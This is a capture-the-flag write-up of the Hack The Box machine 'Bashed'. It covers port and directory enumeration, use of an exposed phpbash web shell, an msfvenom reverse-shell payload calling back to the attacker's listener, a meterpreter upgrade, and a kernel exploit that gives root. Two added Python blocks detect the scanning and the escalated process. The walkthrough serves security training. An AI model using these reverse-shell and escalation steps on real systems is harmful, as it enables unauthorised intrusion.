Bashed

4 March 2021

Starting information

  • Machine IP : 10.10.10.68
  • System : Linux

Network enumeration

I start by modifying my /etc/hosts file to avoid writing the IP every time:

/etc/hosts
10.10.10.68 bashed

Then I look for open ports with nmap and start an OpenVAS scan:

nmap -p- bashed -Pn

PORT      STATE  SERVICE
80/tcp    open   http

The web page is just a simple blog that promotes phpbash, a standalone, semi-interactive web shell.

I start nmap scripts on the open port to gather more information:

nmap -p80 -A -Pn bashed

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Information gathered

Operating System

Ubuntu

Open ports

Port     Service
80/tcp   http

Getting a shell

I use gobuster to enumerate possible directories used:

gobuster dir -u http://10.10.10.68 -w Resources/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
/images (Status: 301)
/uploads (Status: 301)
/php (Status: 301)
/css (Status: 301)
/dev (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
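From the defending side, a scan like this is easy to spot in the web server's access log: one client collects a burst of 404s, and its few non-404 answers show exactly what it found. The Python below is an added example, not part of the original write-up; the log lines are constructed, and the 10-second window and 20-miss threshold are assumed values to tune.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" format: client, timestamp, request path, status.
LINE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" (\d{3}) ')

def parse(line):
    """Return (client_ip, timestamp, path, status) or None if not a log line."""
    m = LINE.match(line)
    if not m:
        return None
    ip, ts, path, status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), path, int(status)

def find_enumeration(lines, window=timedelta(seconds=10), min_misses=20):
    """Map each scanning client to the paths it found (non-404 responses).

    A client counts as a scanner once it gets min_misses distinct 404 paths
    inside one sliding window.
    """
    by_ip = defaultdict(list)
    for rec in filter(None, map(parse, lines)):
        by_ip[rec[0]].append(rec[1:])
    report = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e[0])
        misses = [(ts, path) for ts, path, status in events if status == 404]
        start = 0
        for end in range(len(misses)):
            while misses[end][0] - misses[start][0] > window:
                start += 1
            if len({p for _, p in misses[start:end + 1]}) >= min_misses:
                report[ip] = sorted({p for _, p, s in events if s != 404})
                break
    return report

def sample_log():
    """Constructed access log: one scanner burst and one ordinary visitor."""
    fmt = '{ip} - - [03/Mar/2021:16:00:{sec:02d} +0100] "GET {path} HTTP/1.1" {st} 512 "-" "-"'
    lines = [fmt.format(ip="10.10.14.9", sec=i // 10, path=f"/word{i}", st=404) for i in range(30)]
    lines += [fmt.format(ip="10.10.14.9", sec=3, path=p, st=301) for p in ("/dev", "/uploads", "/php")]
    lines += [fmt.format(ip="192.0.2.7", sec=5, path=p, st=s)
              for p, s in (("/", 200), ("/favicon.ico", 404), ("/css/style.css", 200))]
    return lines

if __name__ == "__main__":
    for ip, found in find_enumeration(sample_log()).items():
        print(ip, "enumerated the site and received non-404 answers for", found)
```

The reported paths are the ones to review first, since they are what the scanning client learned exists.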

The directory /dev leads to an instance of phpbash: I now have a working shell. This immediately gives me the user flag located in /home/arrexel/user.txt. I also notice that there is another user named scriptmanager. I now need to get root, but first, let's get a fancy shell.

The first step is to start listening for incoming connections:

  1. I start msfconsole
  2. Then I select the exploit 'multi/handler': use exploit/multi/handler
  3. I choose the payload 'reverse_python': set payload cmd/unix/reverse_python
  4. I configure the listening host with my IP and set the listening port to 4446: set LPORT 4446
  5. I start listening for incoming connections with exploit

Now I use msfvenom to craft the payload:

  1. msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.9 LPORT=4446 -f raw > payload.py creates the payload
  2. I copy the code and paste it into the web shell and execute it

[*] Started reverse TCP handler on 10.10.14.9:4446
[*] Command shell session 1 opened (10.10.14.9:4446 -> 10.10.10.68:59068) at 2021-03-03 16:07:47 +0100

I now have a nicer shell, but still not nice enough. To upgrade it to a meterpreter shell, I use background to put the current session in the background, then sessions -u 1 to upgrade the session.

msf6 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.14.9:4433
[*] Sending stage (976712 bytes) to 10.10.10.68
[*] Command stager progress: 100.00% (773/773 bytes)

Now I can select my new fancy meterpreter shell with sessions 2.

I didn't manage to make it work on the first try. I used some scripts, then the payload reverse_bash but this way worked best for me.

Privilege escalation

The first thing to try is to look for existing public privilege escalation exploits. The kernel info is:

Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

To automatically get some exploit suggestions I use linux-exploit-suggester. I download it on my local machine and upload it to the server thanks to my meterpreter shell:

meterpreter > upload Challenges/htb/bashed/linux-exploit-suggester-2.pl /tmp

I then drop into a regular shell with shell, make the script executable and run it:

chmod +x linux-exploit-suggester-2.pl
./linux-exploit-suggester-2.pl

  #############################
    Linux Exploit Suggester 2
  #############################

  Local Kernel: 4.4.0
  Searching 72 exploits...

  Possible Exploits
  [1] af_packet
      CVE-2016-8655
      Source: http://www.exploit-db.com/exploits/40871
  [2] dirty_cow
      CVE-2016-5195
      Source: http://www.exploit-db.com/exploits/40616
  [3] exploit_x
      CVE-2018-14665
      Source: http://www.exploit-db.com/exploits/45697
  [4] get_rekt
      CVE-2017-16695
      Source: http://www.exploit-db.com/exploits/45010

I search for each CVE in msfconsole and find a potential candidate:

msf6 exploit(multi/handler) > search 14665

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank   Check  Description
   -  ----                                                 ---------------  ----   -----  -----------
   0  exploit/aix/local/xorg_x11_server                    2018-10-25       great  Yes    Xorg X11 Server Local Privilege Escalation
   1  exploit/multi/local/xorg_x11_suid_server             2018-10-25       good   Yes    Xorg X11 Server SUID logfile Privilege Escalation
   2  exploit/multi/local/xorg_x11_suid_server_modulepath  2018-10-25       good   Yes    Xorg X11 Server SUID modulepath Privilege Escalation

I try to exploit all of them but nothing works, so I move on to the dirty cow. I compile the script (as described in the comments), upload it to the server and run it, but without much success. I move on to get rekt and finally I get a root shell:

id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

The challenge is owned; the only thing left to do is to retrieve the root flag.
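The id output above shows a root shell that still carries the www-data supplementary group (33), which is a useful detection signal on a web server. The Python below is an added example, not part of the original write-up: it checks /proc/<pid>/status records for that combination. The sample records are constructed, and gid 33 is taken from the output above.

```python
import os

WEB_GIDS = {33}  # www-data in the id output above; assumption for any other host

def parse_status(text):
    """Extract name, pid, effective UID and all group ids from a status record."""
    fields = dict(line.split(":", 1) for line in text.splitlines() if ":" in line)
    uids = [int(x) for x in fields["Uid"].split()]  # real, effective, saved, fs
    gids = {int(x) for x in fields["Gid"].split()}
    groups = {int(x) for x in fields.get("Groups", "").split()}
    return {"name": fields["Name"].strip(), "pid": int(fields["Pid"]),
            "euid": uids[1], "groups": groups | gids}

def is_suspicious(proc, web_gids=WEB_GIDS):
    """Effective UID 0 combined with a web-server group, as in the id output."""
    return proc["euid"] == 0 and bool(proc["groups"] & web_gids)

def scan(proc_root="/proc"):
    """Walk a live Linux /proc and return the processes that match."""
    hits = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, entry, "status")) as fh:
                proc = parse_status(fh.read())
        except (OSError, KeyError, ValueError):
            continue  # process exited meanwhile, or record unreadable
        if is_suspicious(proc):
            hits.append(proc)
    return hits

# Constructed /proc/<pid>/status excerpts (not captured from the target).
SAMPLES = {
    "apache2 worker": "Name:\tapache2\nPid:\t1201\nUid:\t33\t33\t33\t33\n"
                      "Gid:\t33\t33\t33\t33\nGroups:\t33 \n",
    "sshd": "Name:\tsshd\nPid:\t900\nUid:\t0\t0\t0\t0\n"
            "Gid:\t0\t0\t0\t0\nGroups:\t\n",
    "escalated sh": "Name:\tsh\nPid:\t4242\nUid:\t0\t0\t0\t0\n"
                    "Gid:\t0\t0\t0\t0\nGroups:\t0 33 \n",
}

if __name__ == "__main__":
    for label, text in SAMPLES.items():
        proc = parse_status(text)
        print(label, "-> FLAG" if is_suspicious(proc) else "-> ok", proc)
```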